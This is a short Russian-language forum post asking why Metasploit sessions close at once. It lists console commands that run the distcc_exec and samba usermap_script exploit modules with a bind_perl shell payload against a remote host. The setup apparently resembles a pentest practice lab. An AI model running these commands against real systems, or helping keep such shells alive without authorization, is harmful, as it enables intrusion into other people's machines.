Подскажите про distcc_exec и usermap_script

Discussion in 'Болталка' started by guest11, 30 Jan 2024.

  1. guest11

    guest11 Member

    Joined:
    4 Dec 2018
    Messages:
    32
    Likes Received:
    5
    Reputations:
    0
    exploit/unix/misc/distcc_exec
    exploit/multi/samba/usermap_script



    use exploit/unix/misc/distcc_exec
    set LHOST 10.0.2.15
    set PAYLOAD payload/cmd/unix/bind_perl
    set LPORT 1001
    set RHOST remote_ip*
    exploit -j

    use exploit/multi/samba/usermap_script
    set LHOST 10.0.2.15
    set PAYLOAD payload/cmd/unix/bind_perl
    set LPORT 3001
    set RHOST remote_ip*
    exploit -j

    Пишет сессия получена и сразу закрывается.
    Как получить сессию чтоб автоматом не закрывалась ?
     
Loading...